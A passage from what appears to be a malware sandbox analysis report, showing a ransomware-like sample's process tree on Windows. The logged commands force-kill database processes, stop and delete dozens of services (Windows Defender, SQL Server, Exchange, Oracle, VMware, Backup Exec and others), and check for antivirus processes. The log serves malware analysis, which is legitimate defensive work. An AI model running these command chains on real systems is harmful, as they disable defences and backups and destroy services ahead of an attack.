    taskkill -f -im sqlservr.exe
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:5056
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill -f -im ReportingServicesService.exe
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:3364
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill -f -im msftesql.exe
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1048
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill -f -im pg_ctl.exe
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:4800
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill -f -im postgres.exe
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:4336
- - C:\Windows\SysWOW64\net.exe
    net stop MSSQLServerADHelper100
    3⤵
    PID:756
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop MSSQLServerADHelper100
      4⤵
      PID:3660
- - C:\Windows\SysWOW64\net.exe
    net stop MSSQL$ISARS
    3⤵
    PID:4048
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop MSSQL$ISARS
      4⤵
      PID:3728
- - C:\Windows\SysWOW64\net.exe
    net stop MSSQL$MSFW
    3⤵
    PID:3320
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop MSSQL$MSFW
      4⤵
      PID:4496
- - C:\Windows\SysWOW64\net.exe
    net stop SQLAgent$ISARS
    3⤵
    PID:1852
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop SQLAgent$ISARS
      4⤵
      PID:1476
- - C:\Windows\SysWOW64\net.exe
    net stop SQLAgent$MSFW
    3⤵
    PID:2384
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop SQLAgent$MSFW
      4⤵
      PID:4784
- - C:\Windows\SysWOW64\net.exe
    net stop SQLBrowser
    3⤵
    PID:4364
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop SQLBrowser
      4⤵
      PID:1300
- - C:\Windows\SysWOW64\net.exe
    net stop ReportServer$ISARS
    3⤵
    PID:940
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop ReportServer$ISARS
      4⤵
      PID:1140
- - C:\Windows\SysWOW64\net.exe
    net stop SQLWriter
    3⤵
    PID:4144
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop SQLWriter
      4⤵
      PID:3300
- - C:\Windows\SysWOW64\net.exe
    net stop WinDefend
    3⤵
    PID:2140
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop WinDefend
      4⤵
      PID:2308
- - C:\Windows\SysWOW64\net.exe
    net stop mr2kserv
    3⤵
    PID:3636
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop mr2kserv
      4⤵
      PID:1416
- - C:\Windows\SysWOW64\net.exe
    net stop MSExchangeADTopology
    3⤵
    PID:2864
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop MSExchangeADTopology
      4⤵
      PID:1948
- - C:\Windows\SysWOW64\net.exe
    net stop MSExchangeFBA
    3⤵
    PID:3248
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop MSExchangeFBA
      4⤵
      PID:4840
- - C:\Windows\SysWOW64\net.exe
    net stop MSExchangeIS
    3⤵
    PID:1788
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop MSExchangeIS
      4⤵
      PID:4752
- - C:\Windows\SysWOW64\net.exe
    net stop MSExchangeSA
    3⤵
    PID:292
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop MSExchangeSA
      4⤵
      PID:1276
- - C:\Windows\SysWOW64\net.exe
    net stop ShadowProtectSvc
    3⤵
    PID:304
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop ShadowProtectSvc
      4⤵
      PID:300
- - C:\Windows\SysWOW64\net.exe
    net stop SPAdminV4
    3⤵
    PID:3860
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop SPAdminV4
      4⤵
      PID:840
- - C:\Windows\SysWOW64\net.exe
    net stop SPTimerV4
    3⤵
    PID:2244
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop SPTimerV4
      4⤵
      PID:2532
- - C:\Windows\SysWOW64\net.exe
    net stop SPTraceV4
    3⤵
    PID:3236
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop SPTraceV4
      4⤵
      PID:4960
- - C:\Windows\SysWOW64\net.exe
    net stop SPUserCodeV4
    3⤵
    PID:4304
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop SPUserCodeV4
      4⤵
      PID:4196
- - C:\Windows\SysWOW64\net.exe
    net stop SPWriterV4
    3⤵
    PID:1420
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop SPWriterV4
      4⤵
      PID:2180
- - C:\Windows\SysWOW64\net.exe
    net stop SPSearch4
    3⤵
    PID:2884
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop SPSearch4
      4⤵
      PID:3284
- - C:\Windows\SysWOW64\net.exe
    net stop MSSQLServerADHelper100
    3⤵
    PID:5040
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop MSSQLServerADHelper100
      4⤵
      PID:1240
- - C:\Windows\SysWOW64\net.exe
    net stop IISADMIN
    3⤵
    PID:3088
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop IISADMIN
      4⤵
      PID:4160
- - C:\Windows\SysWOW64\net.exe
    net stop firebirdguardiandefaultinstance
    3⤵
    PID:2304
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop firebirdguardiandefaultinstance
      4⤵
      PID:2132
- - C:\Windows\SysWOW64\net.exe
    net stop ibmiasrw
    3⤵
    PID:4340
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop ibmiasrw
      4⤵
      PID:3752
- - C:\Windows\SysWOW64\net.exe
    net stop QBCFMonitorService
    3⤵
    PID:1648
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop QBCFMonitorService
      4⤵
      PID:2056
- - C:\Windows\SysWOW64\net.exe
    net stop QBVSS
    3⤵
    PID:4020
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop QBVSS
      4⤵
      PID:1604
- - C:\Windows\SysWOW64\net.exe
    net stop QBPOSDBServiceV12
    3⤵
    PID:5060
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop QBPOSDBServiceV12
      4⤵
      PID:1400
- - C:\Windows\SysWOW64\net.exe
    net stop "IBM Domino Server (CProgramFilesIBMDominodata)"
    3⤵
    PID:2572
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop "IBM Domino Server (CProgramFilesIBMDominodata)"
      4⤵
      PID:3168
- - C:\Windows\SysWOW64\net.exe
    net stop "IBM Domino Diagnostics (CProgramFilesIBMDomino)"
    3⤵
    PID:4060
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop "IBM Domino Diagnostics (CProgramFilesIBMDomino)"
      4⤵
      PID:4832
- - C:\Windows\SysWOW64\net.exe
    net stop IISADMIN
    3⤵
    PID:3648
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop IISADMIN
      4⤵
      PID:2932
- - C:\Windows\SysWOW64\net.exe
    net stop "Simply Accounting Database Connection Manager"
    3⤵
    PID:2432
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop "Simply Accounting Database Connection Manager"
      4⤵
      PID:3592
- - C:\Windows\SysWOW64\net.exe
    net stop QuickBooksDB1
    3⤵
    PID:2108
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop QuickBooksDB1
      4⤵
      PID:3988
- - C:\Windows\SysWOW64\net.exe
    net stop QuickBooksDB2
    3⤵
    PID:2100
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop QuickBooksDB2
      4⤵
      PID:648
- - C:\Windows\SysWOW64\net.exe
    net stop QuickBooksDB3
    3⤵
    PID:4892
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop QuickBooksDB3
      4⤵
      PID:4896
- - C:\Windows\SysWOW64\net.exe
    net stop QuickBooksDB4
    3⤵
    PID:1880
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop QuickBooksDB4
      4⤵
      PID:3340
- - C:\Windows\SysWOW64\net.exe
    net stop QuickBooksDB5
    3⤵
    PID:2860
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop QuickBooksDB5
      4⤵
      PID:2288
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill -f -im UniFi.exe
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2596
- - C:\Windows\SysWOW64\tasklist.exe
    tasklist /fi "imagename eq MsMpEng.exe"
    3⤵
    - Enumerates processes with tasklist
    - Suspicious use of AdjustPrivilegeToken
    PID:1008
- - C:\Windows\SysWOW64\find.exe
    find /c "PID"
    3⤵
    PID:2960
- - C:\Windows\SysWOW64\tasklist.exe
    tasklist /fi "imagename eq ntrtscan.exe"
    3⤵
    - Enumerates processes with tasklist
    - Suspicious use of AdjustPrivilegeToken
    PID:4208
- - C:\Windows\SysWOW64\find.exe
    find /c "PID"
    3⤵
    PID:4468
- - C:\Windows\SysWOW64\tasklist.exe
    tasklist /fi "imagename eq avp.exe"
    3⤵
    - Enumerates processes with tasklist
    - Suspicious use of AdjustPrivilegeToken
    PID:1532
- - C:\Windows\SysWOW64\find.exe
    find /c "PID"
    3⤵
    PID:864
- - C:\Windows\SysWOW64\tasklist.exe
    tasklist /fi "imagename eq WRSA.exe"
    3⤵
    - Enumerates processes with tasklist
    - Suspicious use of AdjustPrivilegeToken
    PID:1048
- - C:\Windows\SysWOW64\find.exe
    find /c "PID"
    3⤵
    PID:4464
- - C:\Windows\SysWOW64\tasklist.exe
    tasklist /fi "imagename eq egui.exe"
    3⤵
    - Enumerates processes with tasklist
    - Suspicious use of AdjustPrivilegeToken
    PID:768
- - C:\Windows\SysWOW64\find.exe
    find /c "PID"
    3⤵
    PID:3548
- - C:\Windows\SysWOW64\tasklist.exe
    tasklist /fi "imagename eq AvastUI.exe"
    3⤵
    - Enumerates processes with tasklist
    - Suspicious use of AdjustPrivilegeToken
    PID:1244
- - C:\Windows\SysWOW64\find.exe
    find /c "PID"
    3⤵
    PID:756
- - C:\Windows\SysWOW64\cmd.exe
    cmd /c "color b & @sc delete "XT800Service_Personal" & @sc delete SQLSERVERAGENT & @sc delete SQLWriter & @sc delete SQLBrowser & @sc delete MSSQLFDLauncher & @sc delete MSSQLSERVER & @sc delete QcSoftService & @sc delete MSSQLServerOLAPService & @sc delete VMTools & @sc delete VGAuthService & @sc delete MSDTC & @sc delete TeamViewer & @sc delete ReportServer & @sc delete RabbitMQ & @sc delete "AHS SERVICE" & @sc delete "Sense Shield Service" & @sc delete SSMonitorService & @sc delete SSSyncService & @sc delete TPlusStdAppService1300 & @sc delete MSSQL$SQL2008 & @sc delete SQLAgent$SQL2008 & @sc delete TPlusStdTaskService1300 & @sc delete TPlusStdUpgradeService1300 & @sc delete VirboxWebServer & @sc delete jhi_service & @sc delete LMS & @sc delete "FontCache3.0.0.0" & @sc delete "OSP Service""
    3⤵
    PID:2448
  - - C:\Windows\SysWOW64\sc.exe
      sc delete "XT800Service_Personal"
      4⤵
      PID:3852
  - - C:\Windows\SysWOW64\sc.exe
      sc delete SQLSERVERAGENT
      4⤵
      PID:2184
  - - C:\Windows\SysWOW64\sc.exe
      sc delete SQLWriter
      4⤵
      PID:1184
  - - C:\Windows\SysWOW64\sc.exe
      sc delete SQLBrowser
      4⤵
      PID:1708
  - - C:\Windows\SysWOW64\sc.exe
      sc delete MSSQLFDLauncher
      4⤵
      PID:396
  - - C:\Windows\SysWOW64\sc.exe
      sc delete MSSQLSERVER
      4⤵
      PID:3548
  - - C:\Windows\SysWOW64\sc.exe
      sc delete QcSoftService
      4⤵
      PID:4312
  - - C:\Windows\SysWOW64\sc.exe
      sc delete MSSQLServerOLAPService
      4⤵
      PID:1400
  - - C:\Windows\SysWOW64\sc.exe
      sc delete VMTools
      4⤵
      Launches sc.exe
      PID:3160
  - - C:\Windows\SysWOW64\sc.exe
      sc delete VGAuthService
      4⤵
      PID:3236
  - - C:\Windows\SysWOW64\sc.exe
      sc delete MSDTC
      4⤵
      PID:4600
  - - C:\Windows\SysWOW64\sc.exe
      sc delete TeamViewer
      4⤵
      PID:4728
  - - C:\Windows\SysWOW64\sc.exe
      sc delete ReportServer
      4⤵
      PID:4464
  - - C:\Windows\SysWOW64\sc.exe
      sc delete RabbitMQ
      4⤵
      Launches sc.exe
      PID:3160
  - - C:\Windows\SysWOW64\sc.exe
      sc delete "AHS SERVICE"
      4⤵
      PID:4068
  - - C:\Windows\SysWOW64\sc.exe
      sc delete "Sense Shield Service"
      4⤵
      PID:5072
  - - C:\Windows\SysWOW64\sc.exe
      sc delete SSMonitorService
      4⤵
      Launches sc.exe
      PID:2184
  - - C:\Windows\SysWOW64\sc.exe
      sc delete SSSyncService
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:4484
  - - C:\Windows\SysWOW64\sc.exe
      sc delete TPlusStdAppService1300
      4⤵
      PID:776
  - - C:\Windows\SysWOW64\sc.exe
      sc delete MSSQL$SQL2008
      4⤵
      PID:1768
  - - C:\Windows\SysWOW64\sc.exe
      sc delete SQLAgent$SQL2008
      4⤵
      PID:2268
  - - C:\Windows\SysWOW64\sc.exe
      sc delete TPlusStdTaskService1300
      4⤵
      PID:4392
  - - C:\Windows\SysWOW64\sc.exe
      sc delete TPlusStdUpgradeService1300
      4⤵
      PID:3272
  - - C:\Windows\SysWOW64\sc.exe
      sc delete VirboxWebServer
      4⤵
      PID:4356
  - - C:\Windows\SysWOW64\sc.exe
      sc delete jhi_service
      4⤵
      PID:5032
  - - C:\Windows\SysWOW64\sc.exe
      sc delete LMS
      4⤵
      PID:5072
  - - C:\Windows\SysWOW64\sc.exe
      sc delete "FontCache3.0.0.0"
      4⤵
      PID:4488
  - - C:\Windows\SysWOW64\sc.exe
      sc delete "OSP Service"
      4⤵
      PID:1480
- - C:\Windows\SysWOW64\cmd.exe
    cmd /c "color b & @sc delete "DAService_TCP" & @sc delete "eCard-TTransServer" & @sc delete eCardMPService & @sc delete EnergyDataService & @sc delete UI0Detect & @sc delete K3MobileService & @sc delete TCPIDDAService & @sc delete WebAttendServer & @sc delete UIODetect & @sc delete "wanxiao-monitor" & @sc delete VMAuthdService & @sc delete VMUSBArbService & @sc delete VMwareHostd & @sc delete "vm-agent" & @sc delete VmAgentDaemon & @sc delete OpenSSHd & @sc delete eSightService & @sc delete apachezt & @sc delete Jenkins & @sc delete secbizsrv & @sc delete SQLTELEMETRY & @sc delete MSMQ & @sc delete smtpsvrJT & @sc delete zyb_sync & @sc delete 360EntHttpServer & @sc delete 360EntSvc & @sc delete 360EntClientSvc & @sc delete NFWebServer & @sc delete wampapache & @sc delete MSSEARCH & @sc delete msftesql & @sc delete "SyncBASE Service" & @sc delete OracleDBConcoleorcl & @sc delete OracleJobSchedulerORCL & @sc delete OracleMTSRecoveryService"
    3⤵
    PID:2996
  - - C:\Windows\SysWOW64\sc.exe
      sc delete "DAService_TCP"
      4⤵
      PID:4196
  - - C:\Windows\SysWOW64\sc.exe
      sc delete "eCard-TTransServer"
      4⤵
      PID:2132
  - - C:\Windows\SysWOW64\sc.exe
      sc delete eCardMPService
      4⤵
      PID:2320
  - - C:\Windows\SysWOW64\sc.exe
      sc delete EnergyDataService
      4⤵
      PID:3940
  - - C:\Windows\SysWOW64\sc.exe
      sc delete UI0Detect
      4⤵
      PID:1572
  - - C:\Windows\SysWOW64\sc.exe
      sc delete K3MobileService
      4⤵
      Launches sc.exe
      PID:384
  - - C:\Windows\SysWOW64\sc.exe
      sc delete TCPIDDAService
      4⤵
      Launches sc.exe
      PID:2052
  - - C:\Windows\SysWOW64\sc.exe
      sc delete WebAttendServer
      4⤵
      Launches sc.exe
      PID:1808
  - - C:\Windows\SysWOW64\sc.exe
      sc delete UIODetect
      4⤵
      Launches sc.exe
      PID:1008
  - - C:\Windows\SysWOW64\sc.exe
      sc delete "wanxiao-monitor"
      4⤵
      PID:2960
  - - C:\Windows\SysWOW64\sc.exe
      sc delete VMAuthdService
      4⤵
      PID:1128
  - - C:\Windows\SysWOW64\sc.exe
      sc delete VMUSBArbService
      4⤵
      PID:1192
  - - C:\Windows\SysWOW64\sc.exe
      sc delete VMwareHostd
      4⤵
      PID:1092
  - - C:\Windows\SysWOW64\sc.exe
      sc delete "vm-agent"
      4⤵
      PID:4896
  - - C:\Windows\SysWOW64\sc.exe
      sc delete VmAgentDaemon
      4⤵
      PID:860
  - - C:\Windows\SysWOW64\sc.exe
      sc delete OpenSSHd
      4⤵
      Launches sc.exe
      PID:1628
  - - C:\Windows\SysWOW64\sc.exe
      sc delete eSightService
      4⤵
      PID:4788
  - - C:\Windows\SysWOW64\sc.exe
      sc delete apachezt
      4⤵
      PID:4816
  - - C:\Windows\SysWOW64\sc.exe
      sc delete Jenkins
      4⤵
      PID:3392
  - - C:\Windows\SysWOW64\sc.exe
      sc delete secbizsrv
      4⤵
      PID:1584
  - - C:\Windows\SysWOW64\sc.exe
      sc delete SQLTELEMETRY
      4⤵
      PID:3964
  - - C:\Windows\SysWOW64\sc.exe
      sc delete MSMQ
      4⤵
      PID:2336
  - - C:\Windows\SysWOW64\sc.exe
      sc delete smtpsvrJT
      4⤵
      PID:776
  - - C:\Windows\SysWOW64\sc.exe
      sc delete zyb_sync
      4⤵
      PID:3856
  - - C:\Windows\SysWOW64\sc.exe
      sc delete 360EntHttpServer
      4⤵
      PID:756
  - - C:\Windows\SysWOW64\sc.exe
      sc delete 360EntSvc
      4⤵
      PID:4072
  - - C:\Windows\SysWOW64\sc.exe
      sc delete 360EntClientSvc
      4⤵
      PID:2620
  - - C:\Windows\SysWOW64\sc.exe
      sc delete NFWebServer
      4⤵
      Launches sc.exe
      PID:4816
  - - C:\Windows\SysWOW64\sc.exe
      sc delete wampapache
      4⤵
      PID:4720
  - - C:\Windows\SysWOW64\sc.exe
      sc delete MSSEARCH
      4⤵
      PID:2124
  - - C:\Windows\SysWOW64\sc.exe
      sc delete msftesql
      4⤵
      PID:4240
  - - C:\Windows\SysWOW64\sc.exe
      sc delete "SyncBASE Service"
      4⤵
      PID:2320
  - - C:\Windows\SysWOW64\sc.exe
      sc delete OracleDBConcoleorcl
      4⤵
      PID:3480
  - - C:\Windows\SysWOW64\sc.exe
      sc delete OracleJobSchedulerORCL
      4⤵
      PID:3856
  - - C:\Windows\SysWOW64\sc.exe
      sc delete OracleMTSRecoveryService
      4⤵
      PID:1092
- - C:\Windows\SysWOW64\cmd.exe
    cmd /c "color b & @sc delete OracleOraDb11g_home1ClrAgent & @sc delete OracleOraDb11g_home1TNSListener & @sc delete OracleVssWriterORCL & @sc delete OracleServiceORCL & @sc delete aspnet_state @sc delete Redis & @sc delete OracleVssWriterORCL & @sc delete JhTask & @sc delete ImeDictUpdateService & @sc delete XT800Service_Personal & @sc delete MCService & @sc delete ImeDictUpdateService & @sc delete allpass_redisservice_port21160 & @sc delete "Flash Helper Service" & @sc delete "Kiwi Syslog Server" & @sc delete "UWS HiPriv Services""
    3⤵
    PID:816
  - - C:\Windows\SysWOW64\sc.exe
      sc delete OracleOraDb11g_home1ClrAgent
      4⤵
      PID:1584
  - - C:\Windows\SysWOW64\sc.exe
      sc delete OracleOraDb11g_home1TNSListener
      4⤵
      PID:3964
  - - C:\Windows\SysWOW64\sc.exe
      sc delete OracleVssWriterORCL
      4⤵
      PID:2056
  - - C:\Windows\SysWOW64\sc.exe
      sc delete OracleServiceORCL
      4⤵
      PID:4560
  - - C:\Windows\SysWOW64\sc.exe
      sc delete aspnet_state @sc delete Redis
      4⤵
      Launches sc.exe
      PID:2596
  - - C:\Windows\SysWOW64\sc.exe
      sc delete OracleVssWriterORCL
      4⤵
      PID:3692
  - - C:\Windows\SysWOW64\sc.exe
      sc delete JhTask
      4⤵
      Launches sc.exe
      PID:4196
  - - C:\Windows\SysWOW64\sc.exe
      sc delete ImeDictUpdateService
      4⤵
      PID:4524
  - - C:\Windows\SysWOW64\sc.exe
      sc delete XT800Service_Personal
      4⤵
      PID:2108
  - - C:\Windows\SysWOW64\sc.exe
      sc delete MCService
      4⤵
      PID:2360
  - - C:\Windows\SysWOW64\sc.exe
      sc delete ImeDictUpdateService
      4⤵
      Launches sc.exe
      PID:3580
  - - C:\Windows\SysWOW64\sc.exe
      sc delete allpass_redisservice_port21160
      4⤵
      PID:3832
  - - C:\Windows\SysWOW64\sc.exe
      sc delete "Flash Helper Service"
      4⤵
      PID:1080
  - - C:\Windows\SysWOW64\sc.exe
      sc delete "Kiwi Syslog Server"
      4⤵
      Launches sc.exe
      PID:1604
  - - C:\Windows\SysWOW64\sc.exe
      sc delete "UWS HiPriv Services"
      4⤵
      PID:3648
- - C:\Windows\SysWOW64\cmd.exe
    cmd /c "color b & @sc delete "UWS LoPriv Services" & @sc delete ftnlsv3 & @sc delete ftnlses3 & @sc delete FxService & @sc delete "UtilDev Web Server Pro" & @sc delete ftusbrdwks & @sc delete ftusbrdsrv & @sc delete "ZTE USBIP Client Guard" & @sc delete "ZTE USBIP Client" & @sc delete "ZTE FileTranS" & @sc delete wwbizsrv & @sc delete qemu-ga & @sc delete AlibabaProtect & @sc delete ZTEVdservice & @sc delete kbasesrv & @sc delete MMRHookService & @sc delete OracleJobSchedulerORCL & @sc delete IpOverUsbSvc & @sc delete MsDtsServer100 & @sc delete KuaiYunTools & @sc delete KMSELDI & @sc delete btPanel & @sc delete Protect_2345Explorer & @sc delete 2345PicSvc & @sc delete vmware-converter-agent & @sc delete vmware-converter-server & @sc delete vmware-converter-worker & @sc delete QQCertificateService & @sc delete OracleRemExecService & @sc delete GPSDaemon & @sc delete GPSUserSvr & @sc delete GPSDownSvr & @sc delete GPSStorageSvr & @sc delete GPSDataProcSvr & @sc delete GPSGatewaySvr & @sc delete GPSMediaSvr & @sc delete GPSLoginSvr & @sc delete GPSTomcat6 & @sc delete GPSMysqld & @sc delete GPSFtpd & @sc delete "Zabbix Agent" & @sc delete BackupExecAgentAccelerator & @sc delete bedbg & @sc delete BackupExecDeviceMediaService & @sc delete BackupExecRPCService & @sc delete BackupExecAgentBrowser & @sc delete BackupExecJobEngine & @sc delete BackupExecManagementService & @sc delete MDM & @sc delete TxQBService & @sc delete Gailun_Downloader & @sc delete RemoteAssistService & @sc delete YunService & @sc delete Serv-U & @sc delete "EasyFZS Server" & @sc delete "Rpc Monitor" & @sc delete OpenFastAssist & @sc delete "Nuo Update Monitor" & @sc delete "Daemon Service" & @sc delete asComSvc & @sc delete OfficeUpdateService & @sc delete RtcSrv & @sc delete RTCASMCU & @sc delete FTA & @sc delete MASTER & @sc delete NscAuthService & @sc delete MSCRMUnzipService & @sc delete MSCRMAsyncService$maintenance"
    3⤵
    PID:1644
  - - C:\Windows\SysWOW64\sc.exe
      sc delete "UWS LoPriv Services"
      4⤵
      PID:4524
  - - C:\Windows\SysWOW64\sc.exe
      sc delete ftnlsv3
      4⤵
      PID:3684
  - - C:\Windows\SysWOW64\sc.exe
      sc delete ftnlses3
      4⤵
      PID:484
  - - C:\Windows\SysWOW64\sc.exe
      sc delete FxService
      4⤵
      Launches sc.exe
      PID:1244
  - - C:\Windows\SysWOW64\sc.exe
      sc delete "UtilDev Web Server Pro"
      4⤵
      Launches sc.exe
      PID:5012
  - - C:\Windows\SysWOW64\sc.exe
      sc delete ftusbrdwks
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:4728
  - - C:\Windows\SysWOW64\sc.exe
      sc delete ftusbrdsrv
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:4060
  - - C:\Windows\SysWOW64\sc.exe
      sc delete "ZTE USBIP Client Guard"
      4⤵
      PID:2180
  - - C:\Windows\SysWOW64\sc.exe
      sc delete "ZTE USBIP Client"
      4⤵
      PID:1248
  - - C:\Windows\SysWOW64\sc.exe
      sc delete "ZTE FileTranS"
      4⤵
      PID:2232
  - - C:\Windows\SysWOW64\sc.exe
      sc delete wwbizsrv
      4⤵
      PID:4196
  - - C:\Windows\SysWOW64\sc.exe
      sc delete qemu-ga
      4⤵
      PID:1708
  - - C:\Windows\SysWOW64\sc.exe
      sc delete AlibabaProtect
      4⤵
      PID:4996
  - - C:\Windows\SysWOW64\sc.exe
      sc delete ZTEVdservice
      4⤵
      PID:3088
  - - C:\Windows\SysWOW64\sc.exe
      sc delete kbasesrv
      4⤵
      PID:2204
  - - C:\Windows\SysWOW64\sc.exe
      sc delete MMRHookService
      4⤵
      PID:3196
  - - C:\Windows\SysWOW64\sc.exe
      sc delete OracleJobSchedulerORCL
      4⤵
      PID:2180
  - - C:\Windows\SysWOW64\sc.exe
      sc delete IpOverUsbSvc
      4⤵
      PID:4984
  - - C:\Windows\SysWOW64\sc.exe
      sc delete MsDtsServer100
      4⤵
      PID:4464
  - - C:\Windows\SysWOW64\sc.exe
      sc delete KuaiYunTools
      4⤵
      PID:5048
  - - C:\Windows\SysWOW64\sc.exe
      sc delete KMSELDI
      4⤵
      PID:2488
  - - C:\Windows\SysWOW64\sc.exe
      sc delete btPanel
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:1184
  - - C:\Windows\SysWOW64\sc.exe
      sc delete Protect_2345Explorer
      4⤵
      PID:5056
  - - C:\Windows\SysWOW64\sc.exe
      sc delete 2345PicSvc
      4⤵
      PID:3572
  - - C:\Windows\SysWOW64\sc.exe
      sc delete vmware-converter-agent
      4⤵
      Launches sc.exe
      PID:5048
  - - C:\Windows\SysWOW64\sc.exe
      sc delete vmware-converter-server
      4⤵
      PID:1716
  - - C:\Windows\SysWOW64\sc.exe
      sc delete vmware-converter-worker
      4⤵
      PID:1604
  - - C:\Windows\SysWOW64\sc.exe
      sc delete QQCertificateService
      4⤵
      PID:4048
  - - C:\Windows\SysWOW64\sc.exe
      sc delete OracleRemExecService
      4⤵
      PID:2928
  - - C:\Windows\SysWOW64\sc.exe
      sc delete GPSDaemon
      4⤵
      PID:5040
  - - C:\Windows\SysWOW64\sc.exe
      sc delete GPSUserSvr
      4⤵
      PID:1868
  - - C:\Windows\SysWOW64\sc.exe
      sc delete GPSDownSvr
      4⤵
      PID:4068
  - - C:\Windows\SysWOW64\sc.exe
      sc delete GPSStorageSvr
      4⤵
      Launches sc.exe
      PID:4484
  - - C:\Windows\SysWOW64\sc.exe
      sc delete GPSDataProcSvr
      4⤵
      PID:4952
  - - C:\Windows\SysWOW64\sc.exe
      sc delete GPSGatewaySvr
      4⤵
      PID:2296
  - - C:\Windows\SysWOW64\sc.exe
      sc delete GPSMediaSvr
      4⤵
      PID:1128
  - - C:\Windows\SysWOW64\sc.exe
      sc delete GPSLoginSvr
      4⤵
      PID:4892
  - - C:\Windows\SysWOW64\sc.exe
      sc delete GPSTomcat6
      4⤵
      Launches sc.exe
      PID:4408
  - - C:\Windows\SysWOW64\sc.exe
      sc delete GPSMysqld
      4⤵
      PID:4160
  - - C:\Windows\SysWOW64\sc.exe
      sc delete GPSFtpd
      4⤵
      PID:1280
  - - C:\Windows\SysWOW64\sc.exe
      sc delete "Zabbix Agent"
      4⤵
      Launches sc.exe
      PID:2996
  - - C:\Windows\SysWOW64\sc.exe
      sc delete BackupExecAgentAccelerator
      4⤵
      PID:4240
  - - C:\Windows\SysWOW64\sc.exe
      sc delete bedbg
      4⤵
      PID:1848
  - - C:\Windows\SysWOW64\sc.exe
      sc delete BackupExecDeviceMediaService
      4⤵
      PID:4068
  - - C:\Windows\SysWOW64\sc.exe
      sc delete BackupExecRPCService
      4⤵
      PID:3196
  - - C:\Windows\SysWOW64\sc.exe
      sc delete BackupExecAgentBrowser
      4⤵
      Launches sc.exe
      PID:4132
  - - C:\Windows\SysWOW64\sc.exe
      sc delete BackupExecJobEngine
      4⤵
      PID:2124
- - C:\Windows\SysWOW64\cmd.exe
    cmd /c "color a & @net stop U8WorkerService1 & @net stop U8WorkerService2 & @net stop "memcached Server" & @net stop Apache2.4 & @net stop UFIDAWebService & @net stop MSComplianceAudit & @net stop MSExchangeADTopology & @net stop MSExchangeAntispamUpdate & @net stop MSExchangeCompliance & @net stop MSExchangeDagMgmt & @net stop MSExchangeDelivery & @net stop MSExchangeDiagnostics & @net stop MSExchangeEdgeSync & @net stop MSExchangeFastSearch & @net stop MSExchangeFrontEndTransport & @net stop MSExchangeHM & @net stop MSSQL$SQL2008 & @net stop MSExchangeHMRecovery & @net stop MSExchangeImap4 & @net stop MSExchangeIMAP4BE & @net stop MSExchangeIS & @net stop MSExchangeMailboxAssistants & @net stop MSExchangeMailboxReplication & @net stop MSExchangeNotificationsBroker & @net stop MSExchangePop3 & @net stop MSExchangePOP3BE & @net stop MSExchangeRepl & @net stop MSExchangeRPC & @net stop MSExchangeServiceHost & @net stop MSExchangeSubmission & @net stop MSExchangeThrottling & @net stop MSExchangeTransport & @net stop MSExchangeTransportLogSearch & @net stop MSExchangeUM & @net stop MSExchangeUMCR & @net stop MySQL5_OA"
    3⤵
    PID:3300
  - - C:\Windows\SysWOW64\net.exe
      net stop U8WorkerService1
      4⤵
      PID:2508
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop U8WorkerService1
        5⤵
